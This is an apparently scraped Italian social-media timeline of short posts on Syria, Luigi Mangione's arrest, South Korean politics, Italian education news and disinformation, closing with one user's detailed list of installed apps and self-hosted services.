Il regime di Bashar al-Assad è caduto ma in Siria non c’è
ancora la pace, eppure il governo Meloni
(come mezza Europa) ha già sospeso l’esame delle richieste di asilo dei siriani, prima ancora di capire cosa ne sarà del Paese arabo. Il Consiglio dei Ministri, ha



Il #10dicembre è la Giornata Mondiale dei Diritti Umani, istituita nel 1950 dall'ONU.
La celebrazione ricorre nel giorno in cui, nel 1948, l'Assemblea Generale delle Nazioni Unite adottò la Dichiarazione Universale dei Diritti Umani.


Così l’industria Usa punta alla leadership sui droni nel settore della Difesa

@Notizie dall'Italia e dal mondo

I droni stanno rivoluzionando la conduzione delle operazioni militari, ma senza protocolli di gestione comuni il loro impiego rischia di rappresentare un ostacolo all’interoperabilità. L’ingegneria modulare, i bassi costi di produzione e la progettazione di diverse




Se io venissi arrestato in quanto sospetto per omicidio, direbbero anche di me "era un informatico, aveva dei contributi pubblici su GitHub".

Non so perché mi fa uno strano effetto leggere notizie di questo tipo relativamente a #LuigiMangione.

E mi darebbe più fastidio vedere pubblicati tutti i miei bug che le mie foto personali 😅



In what might be the first assassination in the United States using a 3D printed weapon, multiple people told 404 Media an image of the weapon found on the person of interest in the shooting of the UnitedHealthcare CEO looks like a specific design of 3D printed Glock.#News
#News


"Arrestato l'assassino"
"Fermato per omicidio"

Sono i giornalisti o i titolisti a essere più stronzi?

Non è stato arrestato per omicidio, ma per essere stato beccato in possesso di una cosiddetta ghost gun, un'arma non registrata, probabilmente prodotta con una stampante 3D.

Per ora è una "persona d'interesse", un sospettato. Gli indizi sono pesanti, ma le verifiche del caso sono in corso.

Ma i giornalisti italiani sono più furbi e non hanno bisogno di prove.

Ma annatevene affanculo, va'.

#giornalismodemmerda sempre e comunque.



Quando si fa parte di un'associazione amatoriale basata su un interesse, si possono vedere i progressi e gli errori di altri "colleghi" in molti modi possibili
1) Essendo un interesse, diamo la priorità all'esistenza interesse, tenendo conto di come si esprime in relazione alle caratteristiche della persona, e quindi pure le competenze tecniche sono subordinate a una capacità funzionale e interessi molto specifici. Abbiamo pertanto detto che in questo contesto l'interesse per la materia assume il valore principale, mentre c'è molta tolleranza in merito all'effettiva presenza di capacità specifiche tecniche. In sostanza conta mostrare interesse e non acquisire competenze. Si presuppone che le competenze seguiranno naturalmente, specie senza forzature, secondo le inclinazioni specifiche della persona.
2) Si trasforma l'interesse in una "professione", si comincia a dare patenti, patenti di "VERO" appartenente alla categoria, a disprezzare chi capita per presunte incapacità, tendendo ad "auto-assolversi", per le mancanze proprie definite non importanti, ma considerando "imperdonabili" e "gravemente lesive della categoria" le mancanze altrui.
Un associazionismo del secondo tipo in Italia tende a essere molto diffuso e credo sia distruttivo alla lunga per la sopravvivenza dell'interesse specifico. In questo secondo caso, si finisce spesso, a "sovrapporre" alle valutazioni tecniche, in modo automatico e inconsapevole, valutazioni soggettive più personali che tecniche.

ho chiesto a una AI di riformulare e dire sostanzialmente le mie stesse cose in modo più "scorrevole", e questo è il risultato:

"Spesso, nelle associazioni di appassionati, si assiste a due dinamiche molto diverse. Da un lato, c'è chi celebra la diversità delle competenze e l'importanza della passione. In questo caso, l'apprendimento è un percorso personale e l'errore è visto come un'opportunità di crescita. Dall'altro, si instaura un clima più competitivo, dove si tende a giudicare gli altri e a stabilire chi è "vero" appassionato e chi no. Questa seconda dinamica, a mio avviso, è dannosa perché soffoca la creatività e l'entusiasmo che dovrebbero essere alla base di ogni gruppo."

ho deciso di pubblicare anche questa seconda rielaborazione, perché credo aggiunga chiarezza al mio discorso.



I viaggi d’istruzione, fondamentali per arricchire il percorso educativo degli #studenti, sono stati salvaguardati grazie a una serie di misure adottate dal #MIM in collaborazione con l’Autorità Nazionale Anticorruzione (ANAC).


La crisi della democrazia, il rischio di un secondo golpe e il popolo sudcoreano che non si ferma


"Non è possibile". Due ragazze si stringono su un telefonino, smettendo per un attimo di saltellare per difendersi dal freddo della sera di Seoul. Sul piccolo schermo, vanno in onda le immagini in diretta dei parlamentari del Partito del Potere Popolare (PPP) che se ne vanno.

Dopo aver votato contro l'istituzione di una commissione d'inchiesta speciale sulla first lady Kim Keon-hee, lasciano l'aula proprio mentre l'Assemblea nazionale è chiamata a esprimersi sul destino di Yoon Suk-yeol, il presidente che ha osato imporre la prima legge marziale dell'era democratica della Corea del Sud. Le sedie del partito di governo sono abbandonate, tranne quella di Ahn Cheol-soo, tre volte candidato alle presidenziali per il PPP, l'unico a restare. Il palazzo simbolo della democrazia sudcoreana resta mezzo vuoto.

valigiablu.it/corea-del-sud-im…

@Politica interna, europea e internazionale

macfranc reshared this.



Il #MIM pubblicherà oggi il #bando per l’assunzione a tempo indeterminato di 145 dirigenti tecnici di seconda fascia con funzioni ispettive.


La disinformazione russa è un problema, ma la qualità dell’informazione sui social è un problema maggiore

@Politica interna, europea e internazionale

Sabato, due giornali animati da un populismo uguale e contrario come il Fatto quotidiano e la Verità hanno “sparato” in prima pagina un allarmato giudizio sull’annullamento del primo turno delle

reshared this



PODCAST. Passato Assad arriva il jihadista Al Julani: la Siria nell’incertezza, Israele si avvantaggia


@Notizie dall'Italia e dal mondo
Il repentino passaggio di poteri raccoglie il favore del mondo occidentale, ma regna l'inquietudine sulle politiche che svolgeranno HTS e gli altri gruppi radicali che ora dominano a Damasco. Netanyahu



Elenco software installato


L'idea di Quintarelli @quinta :ubuntu: di proporre il software installato sui propri dispositivi mi e' tornata utile, spero torni utile la mia.

Mobile Android

Calendario: Etar
Mail: K-9, Thunderbird
Task&Note: OpenTask, JTX Board
SMS: QKSMS
Contatti: Simple Contact Pro
Bookmark sync: XBrowserSync, Floocus, Firefox
Home automation client: HomeAssistant client, Home bridge client
App store: Aurora store, App Lounge, F-Droid, GPlay
Audio&Videoconferenze: Teams, Google chat
Galleria Foto: Aves Libre
Grafica: Linwood Butterfly Nightly (disegno mano libera)
Browser: Firefox e Focus , Kiwi Browser, LibreWolf, DuckDuckGo, Bromite
Motore ricerca: DuckDuckGo, Qwant
Meteo: MeteoAM, Weawow, Breezy weather
Chat: Element, Deltachat, Fluffychat, WA
Cloud: Infomaniak Kdrive, Webdav, Nextcloud e/os
File manager: Material File
Identità digitale: Spid
Condivisione file local network: Warpinator , KDE connect
Mappe: GMaps, Organic Maps
Editor OSM : Vespucci
Fediverso: Racoon, Phanpy, Browser
VideoMusic&Radio streaming: VLC, Radiodroid
Navigatore: Waze, MagicEarth, GMaps
Desktop remoto: NoMachine (client)
2FA authenticator: Aegis, Google Authenticator, Fortitoken, Bitwarden
Password Manager: Keepass2Android, Nextcloud password
Ebook/PDF reader: Librera FD
News: Flym (era un bel reader RSS ormai archiviato)
Podcast: AntennaPod
QR Code reader: QR Scanner
Sincronizzatore CalDav/CardDAV: DAVx5
Tastiere: HeliBoard
Tool di rete: LTE Discovery, ConnectBot (ssh), Duorem (wakeOnLan)
VPN: OpenVPN, Netbird, Forticlient
Altro : BatteryBot


Personal Computer

Hardware: MinisForum
OS: LinuMint 22 Cinnamon
Backup: Backup Tool, TimeShift, rsync locale, Foxclone, CloneZilla
Browsers: Librewolf, Firefox
Chat: WA
Grafica: XnView MP
Mail/calendar/contacts: Thunderbird
VideoMusic&Radio streaming: VLC
Office: Libre Office
Password manager: KeepassXC, Nextcloud password
Cloud: Infomaniak Kdrive, Webdav, Nextcloud e/os
VPN: OpenVPN, Netbird, Forticlient
Desktop remoto: Remmina, NoMachine (server/client)

Rasperry 4: Home Assistant server

Server remoto

Hosting dirtynello.it su SupportHost: Mail (smtp, imap) Caldav, Carddav, Webdav,
Blog: WordPress
Forum: Php Forum
Foto: Pwigo

Server locale: Notebook Fujitszu Core 2 P8400

OS: Ubuntu server 22.04
Streaming Audio&Video: Minidlna
File system share: NFS
Home Automation: HomeBridge
Desktop remoto: Remmina, NoMachine (server/client)
Varie: AMule, Devolo, Virtualbox, LuckyBackup
VPN: OpenVPN, Netbird

Estensioni Browser: Floccus, KeepasXC, Keepa, Tranquility Reader, uBlock Origin, Ghost, Nextcloud password